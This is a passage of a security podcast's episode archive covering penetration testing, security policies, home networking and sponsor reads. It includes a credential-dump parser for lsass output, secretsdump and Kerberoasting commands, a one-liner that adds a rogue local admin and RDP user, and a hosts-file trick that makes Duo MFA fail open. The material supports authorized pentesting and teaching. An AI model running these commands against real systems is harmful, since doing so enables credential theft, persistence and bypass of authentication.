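def to_hashcat_lines(creds: List[Dict[str, str]]) -> List[str]:
    """'user:nthash' lines for: hashcat -m 1000 --username lsass.hashes wordlist"""
    return [f"{c['username']}:{c['nt']}" for c in creds]


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LSASS_TXT
    for c in parse_msv_credentials(text):
        flag = "  <-- empty password" if c["empty_password"] else ""
        print(f"{c['domain']}\\{c['username']}:{c['nt']}{flag}")
```

    Run it as python3 comb.py lsass.txt; the machine account and the duplicate session collapse to a single brian.admin line. Pass the NT hashes straight to pass-the-hash tooling or to hashcat with --username so the user names survive cracking.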


    7MS #422: Eating the Security Dog Food - Part 2 Jul 10, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me (https://safepass.me/?7ms422) for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today's episode continues the work we started in episode #419. We talk about the importance of having a good foundation of security documentation - including a reading out of the following policies:

    • Acceptable use
    • Data protection and privacy

    7MS #421: Cyber News - Verizon DBIR Edition Jul 01, 2020

    Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network!

    I'm especially excited because today's episode marks two important 7MS firsts:

    • The episode has been crafted by a professional podcast producer
    • The episode has been transcribed by a professional transcription service

    7MS #420: Tales of Internal Pentest Pwnage - Part 17 Jun 26, 2020

    Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever.

    I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig.

    One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6).

    This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included:

    • Capturing hashes with Responder
    • Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user)
    • Check for MS14-025 (see this article)
    • Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try this method of exploiting it
    • Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axfr)
    • Test for egress filtering of ports 1-1024
    • Took a backup of AD "the Microsoft way" and then extracted the hashes from it with secretsdump:

    sudo python ./secretsdump.py -ntds /loot/Active\ Directory/ntds.dit -system /loot/registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump
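    The "egress filtering of ports 1-1024" check above, and the egress-firewall test mentioned in episode #423, boil down to trying an outbound TCP connection on every port and noting which ones get out. The following is an added example written for this page, not the script the episodes link to: it runs the probes in parallel with a short timeout against a host you control that listens on every port (no particular host or service is assumed; you supply it on the command line) and prints a one-line summary. The demo function exercises the scanner offline against a loopback listener so the output shape can be seen without leaving the box.

```python
import socket
import sys
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Iterable, List, Tuple


def tcp_connect(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True only if a full TCP handshake to host:port completes.

    Timeouts, RSTs and ICMP unreachables all count as 'not allowed out';
    for an egress test we don't need to tell them apart.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def egress_scan(host: str, ports: Iterable[int], timeout: float = 1.0,
                workers: int = 64) -> List[int]:
    """Try an outbound TCP connection to every port; return the ones that got out."""
    port_list = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, tcp_connect(host, p, timeout)), port_list))
    return sorted(p for p, ok in results if ok)


def summarize(allowed: List[int], tested: Iterable[int]) -> str:
    """One-line summary suitable for pasting into a report."""
    tested = list(tested)
    return (f"{len(allowed)} of {len(tested)} ports allowed outbound: "
            + (", ".join(map(str, allowed)) if allowed else "none"))


def demo_against_local_listener() -> Tuple[int, List[int]]:
    """Offline demo: listen on an ephemeral loopback port and scan a window around it.

    This only proves the scanner works; a real egress test points
    egress_scan() at an external host that answers on every port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    srv.settimeout(0.2)
    port = srv.getsockname()[1]
    stop = threading.Event()

    def accept_loop() -> None:
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
                conn.close()
            except socket.timeout:
                continue
            except OSError:
                break

    t = threading.Thread(target=accept_loop, daemon=True)
    t.start()
    try:
        window = range(max(1, port - 20), min(65535, port + 20) + 1)
        allowed = egress_scan("127.0.0.1", window, timeout=0.5)
    finally:
        stop.set()
        t.join()
        srv.close()
    return port, allowed


if __name__ == "__main__":
    if len(sys.argv) >= 2:
        # Real run: python3 egress_check.py <all-ports-listener-host> [first] [last]
        target = sys.argv[1]
        first = int(sys.argv[2]) if len(sys.argv) > 2 else 1
        last = int(sys.argv[3]) if len(sys.argv) > 3 else 1024
        rng = range(first, last + 1)
        print(summarize(egress_scan(target, rng), rng))
    else:
        listener_port, found = demo_against_local_listener()
        print(f"loopback listener on {listener_port}; scanner found: {found}")
```

    Keep the worker count modest on a customer network so the burst of SYNs does not trip their IDS for the wrong reason, and compare the allowed list against the ports the client believes are blocked.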


    7MS #419: Eating the Security Dog Food Jun 17, 2020

    Today we're talking about eating the security dog food! What do I mean by that? Well, a lot of security companies I worked for in the past preached to clients about the importance of having a good security program, but didn't have one of their own! I'm trying to break that pattern now that I'm in a position to lead an information security program for 7MS.

    In today's episode we talk about getting your company started with a good set of infosec policies/procedures. First up is a "mothership" infosec policy with the following sub-policies inside it:

    • Acceptable Use
    • Data Protection and Privacy
    • Physical Security
    • Tools and Technology
    • Training and Awareness
    • Reporting

    Oh, and the song I jazz/scat/sang coming out of the jingle was If I Were a Dog


    7MS #418: Securing Your Mental Health Jun 11, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today's episode is all about mental health! I talk about some of my challenges with stress/anxiety and how I finally put on my big boy pants, dropped some misconceptions and decided to do something about it. Additionally, this episode contains references to:

    • Jon Secada
    • Arsenio Hall
    • Lone Wolf McQuade

    7MS #417: Vulnerability Scanning Tips and Tricks Jun 04, 2020

    Today's episode is all about getting the most value out of your vulnerability scans, including:

    • Why, IMHO, you should only do credentialed scans

    • Policy tweaks that will keep servers from tipping over and printers from printing novels of gibberish ;-)

    • How to make your scan report more actionable and less unruly

    • Turning up logging to 11 (use with caution!)

    • A small tweak to an external scan policy that can result in the difference between a successful or failed scan

    • The nessusd.rules file is awesome for excluding specific hosts and services from your scans


    7MS #416: Pi-hole 5.0 May 28, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today we're talking about some of my favorite features of Pi-hole 5.0. Including:

    • WARNING! WARNING! Upgrading from 4.x is a one-way operation!

    • Per-client blocking (you can set up, for example, a group of machines called "kids" and apply specific domain block/allow lists to them)

    • More granular detail (especially if there are issues) when blocklists get updated

    • Better, richer debug log output

    I also talk about a great companion for your Pi-hole: a command-line Internet speed test! Hat tip to Javali over at the 7MS forums who told me about this.

    Additionally, I briefly mention "Hashy" (the nickname of my password cracking rig), give you some stay-at-home streaming TV show recommendations, and give you a quick house rebuild update!


    7MS #415: Cyber News May 21, 2020

    Today's episode kicks off a fun little experiment where my pal Joe Skeen and I cover some of the week's interesting security news stories, how they might affect you, and what you can do to make you and your company more secure. This week's stories:

    • SaltStack RCE (Daily Swig / Cyber Scoop)

    • Malware uses Corporate MDM as attack vector (Checkpoint)

    • Critical vulns in Sharefile (Citrix)

    • Shareholders sue Labcorp over their 'persistent' failure to secure data (Cyberscoop)


    7MS #414: Tales of Pentest Fail #4 May 14, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today I'm excited to share more tales of pentest FAIL with you. Today's tales include:

    1. Accidentally scanning assets that belong to an agency that nobody should be messing with

    2. Delivering reports with vulnerabilities from somebody else's network

    3. Why it's important to write a report more than 15 minutes before delivery

    4. Lessons learned from firing a disgruntled employee


    7MS #413: PCI Professional Certification (PCIP) - Part 3 May 07, 2020

    Hey everybody! I hope you're hanging in there during quarantine and staying healthy. Today is part 3 of our ongoing series all about becoming a PCIP. The good news is I'm finally, actually registered for the cert and have started diving into the training! So in today's episode I want to regurgitate some of what I'm learning to whet your appetite (or not) for this particular certification. Specifically, we cover:

    • The overview and objectives for being a PCIP (TLDR: PCIP does NOT replace QSA or ISA, but gives us a good understanding of how to protect payment card data)

    • How and why payment card data is leaked/stolen/breached - and then sold/monetized

    • The definition of some fundamental PCI acronym soup, including PCI DSS, PA-DSS and P2PE


    7MS #412: Tips for Working Safely and Securely From Home May 01, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    In today's episode we share some tips for working more safely and securely from home, which for many of us is our new office for the foreseeable future! Specifically, we cover:

    • Picking powerful passwords
    • Locking down your wifi
    • Defending your digital identity
    • Protecting your PC
    • Blocking icky stuff in your browser
    • Composing careful conference calls
    • Clicking links carefully

    I've also made this episode available in long-form blog here. Please feel free to share with anybody you think could benefit from the info!


    7MS #411: More Fun Stay-at-Home Security Projects Apr 24, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today is sort of a continuation of episode 407 where we covered four fun stay-at-home security projects including Folding@Home, building a headless Pi-hole, redoing your network with a Dream Machine, and enjoying some music via Zoom by way of Q.U.A.C.K.

    In this episode, we cover:

    • Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap!

    • CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle, and even better, they offer online testing during this stay-at-home time!

    • Pi-holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSEC. Just make sure the date/time settings on the box are correct, otherwise DNS will be pretty broken (DNSSEC signatures carry validity windows, so a wrong clock makes every validated answer fail). I discuss a fix here on the 7MS forums....

    Read more at 7ms.us!


    7MS #410: PCI Professional Certification (PCIP) - Part 2 Apr 16, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    I’m gonna love you like coronavirus, I don’t know what else to say I’m gonna love you like coronavirus, I’m gonna stand 6 feet away Yes our love was meant to be, but it will have to wait until later Cuz I don’t wanna end up hooked up to a ventilator

    In today's episode I continue sharing my journey about becoming a PCIP. Spoiler alert: I'm still applying to even start training to be one. Here's what we'll cover:

    • The pentesting requirement 11.3 from PCI that kind of boggles my brain, and some advice I got from a PCI guru that helped clear things up for me. This video also helped me better understand requirement 11.3.

    • The super sucky couple of personal quarantine days I’ve had that include:

      • Cocoa that tastes like mint-flavored old lady diarrhea
      • Our fridge and freezer going ka-put
      • Exploding drinks in my fridge
      • A multi-thousand dollar repair on our new house that hasn’t even technically broken ground yet (!)

    7MS #409: PCI Professional Certification (PCIP) Apr 09, 2020

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today I'm starting a journey to become a PCI Professional (PCIP), and I'll be periodically updating the status of this journey on the 7MS forums.

    You don't need to be a QSA to get a PCIP, but you do need "2 years in IT or payments related background to have your application approved."

    The PCIP certification gives you (and I'm quoting from the PCI Web site):

    • Principles of PCI DSS, PA-DSS, PCI PTS, and PCI P2PE Standards
    • Understanding of PCI DSS requirements and intent
    • Overview of basic payment industry terminology
    • Understanding the transaction flow
    • Implementing a risk-based prioritized approach
    • Appropriate uses of compensating controls
    • Working with third-parties and service providers
    • How and when to use Self-Assessment Questionnaires (SAQs)
    • Recognizing how new technologies affect the PCI (e.g. virtualization, tokenization, mobile, cloud)

    The training + exam for a non-participating organization (like 7MS) costs $2,500. You also have to re-up every 3 years for $260 (yay, another thing to have to pay for regularly).

    In the miscellany department:

    • Do you know someone who would enjoy a live 3-song acoustic concert? Check out my family's new ministry, Q.U.A.C.K. - Quarantined Unplugged Acoustic Concerts of Kindness.

    • A Webinar on creating kick-butt cred-capturing phishing portals is happening on Tuesday, April 14! Register here!


    7MS #408: Cell Phone Security for Tweenagers - Part 2 Apr 03, 2020

    This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS

    "I think of what the world could be If it did not have COVID-19 A million dreams is all it's gonna taaaaaaaaaaaaaaaake!"

    Today's episode is a continuation and update on the cell phone security for tweenagers episode from about a year ago. Specifically, I talk about:

    • How the cell phone contract I put together for my tweenager kind of blew up in my face
    • I'm the worst dad in the world because my wife and I enforced a "no screens" policy for a few weeks. We lived. Barely.
    • Apple Screen Time is your friend, and helps put some limits on iDevice use
    • The Dream Machine makes it easy to setup a segmented wireless network just for your kids. You can also "time box" their individual network to only broadcast at certain hours of the day
    • You can then apply OpenDNS to filter bad sites on just the kiddo network or ALL your networks
    • If you make a home backup/DR plan make sure it includes important stuff like: passwords to important things, as well as critical contacts like your tax prep person, financial advisor and subcontractors.

    More info at 7ms.us!


    7MS #407: Four Fun Stay-at-Home Security Projects Mar 26, 2020

    In today's episode I share four fun stay-at-home security projects - three with a security focus and one centered around music. Let's gooooooooo!

    FoldingAtHome

    The Folding At Home project helps use your GPU/CPU cycles for COVID-19 research. From the Web site:

    We need your help! Folding@home is joining researchers around the world working to better understand the 2019 Coronavirus (2019-nCoV) to accelerate the open science effort to develop new life-saving therapies. By downloading Folding@Home, you can donate your unused computational resources to the Folding@home Consortium, where researchers working to advance our understanding of the structures of potential drug targets for 2019-nCoV that could aid in the design of new therapies. The data you help us generate will be quickly and openly disseminated as part of an open science collaboration of multiple laboratories around the world, giving researchers new tools that may unlock new opportunities for developing lifesaving drugs.

    It's awesome! Since I run my cracking rig as a headless Linux install, I followed the advanced install and then used the command line options to run FAHClient standalone (only because personally I don't really love running extra, always-on services on any of my boxes).

    It looks like FAH is having a good problem in that there are more resource donors than research to number-crunch on! Keep tabs on the forums for up-to-date information.

    See more information at 7ms.us!


    7MS #406: Securing Your Family During and After a Disaster - Part 4 Mar 21, 2020

    This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS

    First and foremost, I hope you all are doing well and taking care of yourselves.

    Today's episode focuses on disasters, which is unfortunately a very appropriate topic. As a quick refresher, our family had a fire a few months ago. It sucked. I talked about the day of the fire in this episode then did a "how do we get back on the grid?" episode here and then answered some of your FAQs here.

    Regardless of if your DR plan includes fires, virus outbreaks, tornados or zombie attacks, it's important to have a solid plan for your family and business. So in today's episode I cover these main two topics:

    A DIY $500 NAS + Unlimited Cloud Backup Plan

    In trying to be more organized with my backup strategy, I set out to create a new backup plan with the following criteria:

    • Priced at ~$500
    • One on-prem array
    • Encrypted at rest
    • Backs up to cloud with encryption key I control
    • Unlimited scalable storage

    I found my solution using this awesome video but I need to warn you about something right off the bat: the config in this video and in today's episode is not supported by CrashPlan because CP doesn't have a native backup agent that will run on the Synology NAS (at the time of this writing, anyway). With that said, here's the grocery list of things that make up my backup rig:

    (See more info on the show notes for today's episode at 7ms.us)


    7MS #405: Tales of Internal Pentest Pwnage - Part 16 Mar 12, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today's episode of pentest pwnage is the (hopefully) exciting conclusion to this episode. Last we left this pentest, we ran into some excellent blue team defenses, including:

    • MFA on internal servers (which we bypassed)
    • Strong passwords
    • Limited vulnerable protocols (LLMNR/Netbios/etc) available to abuse for cred-capturing
    • Servers that were heavily firewalled off from talking SMB to just any ol' subnet nor the Interwebs (here's a great video on how to fine-tune your software firewall chops)

    In today's episode we talk about:

    • How maybe it's not a good idea to make computer go completely "shields down" during pentests

    • Being careful not to fat-finger anything when you spawn cmd.exe with creds, like

    runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"
    • Being careful not to fat-finger anything when using CrackMapExec

    • How fundamental and really effective blue team controls (such as the ones mentioned above) can really make pentesting a headache!

    • How you should be careful when spawning shells with MultiRelay (part of Responder), as it creates new services on your victim machine

    Has the 7MS podcast helped you in your IT and security career? Please consider supporting us!


    7MS #403: 7MOOMAMA - Juice Shop Song + Backdoors and Breaches Jingle Mar 09, 2020

    Today's slightly off-topic episode kicks off a new tag called 7MOOMAMA. That stands for 7 Minutes of Only Music and Miscellaneous Awesomeness.

    To kick things off, I'm super excited to share with you two new security-themed songs for some of my favorite security things! They are:

    • Backdoors and Breaches - my favorite incident response card game.

    • OWASP Juice Shop - my favorite vulnerable Web application.

    Enjoy!

    Backdoors and Breaches

    Backdoors and Breaches I love the way teaches me to think about security controls And their proper placement

    Backdoors and Breaches I can’t wait to blow my paycheck just to get myself a game deck and then move Out of my mother’s basement

    Soon I’ll be sittin’ down and playing it with my red and blue teams Or John and gang at Black Hills Info Security And when I go to bed tonight I know what’s gonna fill my dreams Backdoors and Breaches

    Juice Shop

    VERSE 1 When you want to shop online then you had better be sure The experience is safe and also secure Don't want to let no SQLi or cross-site scripting ruin your day No, you want to break into a joyous song and say:

    CHORUS 1 Juice Shop! Juice Shop! You can order tasty beverages in any quantity Juice Shop! Juice Shop! Just don't test the site with Burp Suite or you won't like what you see

    VERSE 2 Now if you're feeling kinda sneaky and you're inclined to explore You might find inside the Juice Shop...a hidden score board It will point you towards a vuln'rability or maybe two And when you're done you'll say, "This site should get a code review!"

    CHORUS 2 Juice Shop! Juice Shop! It has got more holes than a warehouse filled with gallons of Swiss cheese Juice Shop! Juice Shop!

    ...finish the songs at 7ms.us


    7MS #402: Interview with Matt Duench of Arctic Wolf Feb 26, 2020

    Today I'm joined by Matt Duench (LinkedIn / Twitter), who has a broad background in technology and security - from traveling to over 40 countries around the world working with telecom services, to his current role at Arctic Wolf where he leads product marketing for their managed risk solution.

    Matt chatted with me over Skype about a wide variety of security topics, including:

    • Corporate conversations around security have changed drastically in such a short time - specifically, security is generally no longer perceived as a cost center. So why are so many organizations basically still in security diapers as far as their maturity?

    • Why is it still so hard to find “bad stuff” on the network?

    • What are some common security mistakes you wish you could wave a magic wand and fix for all companies?

    • The beauty of the CIS Top 20 and how following even the top 5 controls can stop 85% of attacks.

    • Low-hanging hacker fruit that all organizations should consider addressing, such as:

      • Disabling IPv6
      • Using a password manager
      • Turning on multi-factor authentication
      • Don’t write down your passwords!
      • Have a mail transport rule that marks external mail as “EXTERNAL” so it jumps out to people
      • Consider an additional rule to stop display name spoofing (h/t to Rob on Slack!)
    • Why you should be concerned about corporate account takeover, and how to better protect yourself and your company against this attack vector

    I also asked Matt a slew of questions that many of you submitted via Slack:

    More info under the show notes for this episode at 7ms.us!


    7MS #401: Tales of Internal Pentest Pwnage - Part 15 Feb 21, 2020

    It’s episode 401 and we’re having fun, right? Some things we cover today:

    • The Webinar version of the DIY Pwnagotchi evening will be offered in Webinar format on Tuesday, March 10 at 10 a.m.

    • A quick house fire update - we’re closer to demolition now!

    • I finally got a new guitar!

    Besides that, I’ve got a wonderful tale of pentest pwnage for you. Warning: this is a TBC (to be continued) episode in that I don’t even know how it will shake out. I’m honestly not sure if we’ll get DA! Here are the highlights:

    • I think in the past I might've said unauthenticated Nessus scans weren't worth much, but this test changed my mind.

    • If you can't dump local hashes with CrackMapExec, try SecretsDump!

    ./secretsdump.py -target-ip {IP of target machine} localhost/{username}@{target IP}
    • If you're relaying net user commands (or just typing them from a relayed shell), this one-liner is a good way to quickly add your user to local admins and the Remote Desktop Users group:
    net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add
    • Trying to RDP into a box protected with Duo MFA? If you can edit the c:\windows\system32\drivers\etc\hosts file, you might be able to change the Duo authentication server from api-xxxxxxx.duosecurity.com to 127.0.0.1 and force authentication to fail open! Source: Pentest Partners

    • In general, keep an eye on CrackMapExec's output whenever you use the '-x' flag to run commands. If the system is "hanging" on a command for a while and then gives you NO output and just drops you back at your Kali prompt, the command might not be running at all due to something else on the system blocking your efforts.

    More on today's show notes at 7ms.us!


    7MS #400: Tales of Internal Pentest Pwnage - Part 14 Feb 14, 2020

    Wow, happy 400th episode everybody! Also, happy SIXTH birthday to the 7MS podcast!

    Today I've got a really fun tale of internal network pentest pwnage to share with you, as well as a story about a "poop-petrator." Key moments and takeaways include:

    • Your target network might have heavy egress filtering in place. I recommend doing full apt-get update and apt-get upgrade and grabbing all the tools you need (may I suggest my script for this?).

    • If the CrackMapExec --sam flag doesn't work for you, give secretsdump a try, as I ran it on an individual Win workstation and it worked like a champ!

    • If the latest mimikatz release doesn't rip out passwords for you, try the release from last August. For whatever reason, that one does (thanks 0xdf for the tip!)

    • If your procdumps of lsass appear to be small, endpoint protection might be getting in the way! You might be able to figure out what's running - and stop the service(s) - with CrackMapExec and the -x 'tasklist /v' flag.

    • If you need to bypass endpoint protection, don't be afraid to go deep into the Google search results. Unfortunately, I think that's all I can say about that, as vendors seem to get snippy about talking about bypasses publicly.

    Has 7MS helped you in your IT and security career? Please consider buying me a coffee!


    7MS #399: Baby's First Password Cracking Rig Feb 07, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Believe it or not I'm pentesting your stuff I never thought I could feel so free-hee-hee I compromised one of your Domain Admins Who it could be? The guy with "Password123"

    In today's episode we're talking all about building your own password-cracking rig! "Wait a minute!" you say. "Are you abandoning the Paperspace password cracking in the cloud thing?" Nope! I'm just bringing that methodology "in house" for a little better opsec and also because last year on Paperspace I spent thousands of dollars.

    First things first - here's the hardware I ended up with:

    • Inland Premium 512GB SSD 3D NAND M.2 2280 PCIe NVMe 3.0 x4 Internal Solid State Drive
    • Intel Core i5-9400F Desktop Processor 6 Core up to 4.1GHz Without Processor Graphics LGA1151 (Intel 300 Series chipset) (https://www.microcenter.com/product/602028/intel-core-i5-9400f-desktop-processor-6-core-up-to-41ghz-without-processor-graphics-lga1151-(intel-300-series-chipset))
    • ASUS ROG Strix Z390-H Gaming LGA 1151 ATX Intel Motherboard
    • EVGA SuperNOVA 1200P2 1200 Watt 80 Plus Platinum Modular Power Supply

    For a full shopping list and more notes, head to 7ms.us!


    7MS #398: Securing Your Network with Raspberry Pi Sensors Jan 30, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    I'll be your Raspberry Pi zero baby I don't know what else to say I'll keep bad stuff off of your network I will do it both night and day

    Today I talk about four cool Raspberry Pi projects that will help you better secure your network.

    First off though, I give a shout out to my son Atticus who I want to be more like because he doesn't give a rat's behind what other people think of him!

    The cool Pi-based projects I love are:

    1. Pi-hole is a black hole for Internet advertisements and it literally installs with just a few commands:
    git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole
    cd "Pi-hole/automated install/"
    sudo bash basic-install.sh
    2. Pwnagotchi is a cute little devil who exists only to capture WPA handshakes! I did a whole episode on it, and invite you to build a DIY Pwnagotchi with me live on Feb 10.

    3. How to use a Raspberry Pi as a Network Sensor is a really cool Webinar I watched (brought to us by our pals at BHIS and ActiveCountermeasures) that shows you how to use a Pi with an external drive to install Bro (now called Zeek) and other tools to help you find bad stuff on your network.

    4. CanaryPi is freaking sweet and can detect NBNS/LLMNR/mDNS spoofing as well as port-scanning, yeah baby! And coming soon (hopefully): mitm6 detection!

    Has 7MS helped you in your IT and security career? Please consider buying me a coffee!


    7MS #397: OPSEC Tips for Security Consultants Jan 23, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    I'm working on a new security song called Don't Let the Internet Get You Down, and the chorus will go something like this:

    Don't let the Internet get you down
    It's full of trolls and 10 year olds and adolescent clowns
    So let their words roll off of you, like water off a duck
    To prove to them that you don't give a darn

    On a more serious note, here are some opsec tips that hopefully will help you as a security consultant:

    1. Good contracts - make sure your SOWs have lots of CYA verbiage to protect you in case something breaks, your assessment schedule needs to be adjusted, etc. Also, consider verbiage that says you'll only retain client testing artifacts (hashes, vuln scans, etc.) for a finite amount of time.

    2. Scope - make sure you talk about scope, both in written and verbal form, often! Also, a Nessus scanning tip: use the nessusd.rules file to not scan any IPs the client doesn't want touched. That way Nessus won't scan those IPs even if you try to force it to!

    3. Send information to/from clients safely - consider forcing MFA on your file-sharing portals, as well as a retention policy so that files "self destruct" after X days.

    ....and more on today's episode (see 7ms.us for more show notes)!

    Has 7MS helped you in your IT and security career? Please consider buying me a coffee!


    7MS #396: Tales of Internal Pentest Pwnage - Part 13 Jan 15, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    In last week's episode I was very close to potentially synching up some very sensitive data with my super secret back door account. In this episode, we resolve the cliffhanger and talk about:

    • How I don't remember lyrics or titles to songs - even the ones I love - such as My Prerogative. That's why Jack Black is my spirit animal, and he's awesome for singing Elton John songs right to Elton John

    • If you get DA (relatively) quickly, consider pivoting to a network assessment and crack hashes with secretsdump, test egress filtering, run Network Detective and more

    • Once you've cracked all the hashes you can, run it through hashcombiner and Pipal like this:

    python /opt/hashcombiner/hash_combiner.py user_hash hash_password | sort > combined.txt
    cut -d ':' -f 2 combined.txt > passwords.txt
    ruby /opt/pipal/pipal.rb passwords.txt > pip.txt

    • The procdump + lsass trick is still really effective (though sometimes AV gobbles it)

    (See full show notes at 7ms.us!)


    7MS #395: Tales of Internal Pentest Pwnage - Part 12 Jan 09, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    In today's tale of pentest pwnage I got to try some tools and tricks for the first time! Here are the key points/takeaways from this test:

    • It's great to have additional goals to achieve in a network pentest outside of just "get DA"

    • PayloadsAllTheThings has a great section on Active Directory attacks

    • Using mitm6 and ntlmrelayx is now my new favorite thing thanks to The Cyber Mentor's fantastic video showing us exactly how to launch this attack!

    • If you're scared of running mitm6 and accidentally knocking folks off your network, setup your Kali box to reboot in a few minutes just to be safe. Do something like:

    shutdown -r +15 "Rebooting in 15 minutes just in case I mitm6 myself right off this box!"

    • When mitm6+ntlmrelay dumps out a series of html/json files with lists of users, groups, etc., read through them! Sometimes they can include treats...like user passwords in the comment fields!

    • Use crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u username -p password to verify if your domain creds are good!

    There are a bunch of people I need to thank because their tools/encouragement/advice played a part in making the test successful. See today's show notes on 7ms.us for more info!


    7MS #394: DIY Pwnagotchi Jan 03, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Sung to the tune of "Do You Wanna Build a Snowman"

    Do you wanna build a Pwnagotchi?
    Even though you thought you never would?
    I really hope mine doesn't ever break
    It grabs wifi handshakes
    It does it really good!

    Today's episode is all about Pwnagotchi, a cute little device whose sole purpose in life is to gobble WPA handshakes! Check out today's episode to learn more about the device (as well as some pwn-a-gotchas that you should be aware of), and then come to the next 7MS user group meeting to build your own! If you can't make this meeting I'll also do a Webinar version of the presentation - likely in February or March, so stay tuned to our Webinars page.

    At the end of today's episode I talk about my troll foot. I fractured my ankle on Christmas Eve and was basically this lady. At the end of the day I received an avulsion fracture and it kinda made my Christmas stink. But 2020 is gonna absolutely rip, friends!


    7MS #393: Interview with Peter Kim Dec 26, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Peter Kim of The Hacker Playbook series joins me today to talk about all things hacking! Peter runs a popular west coast hacker meetup, and I was fortunate enough to attend his Real World Red Team training, which I wrote a review about here. Peter sat down with me over Skype to talk about:

    • The origin story of The Hacker Playbook series (btw please buy it, don't steal it! :-)
    • How do you balance work and family life when trying to pwn all the things and have a personal life and significant other?
    • How do you break into security when your background is in something totally different, like a mechanic, artist or musician?
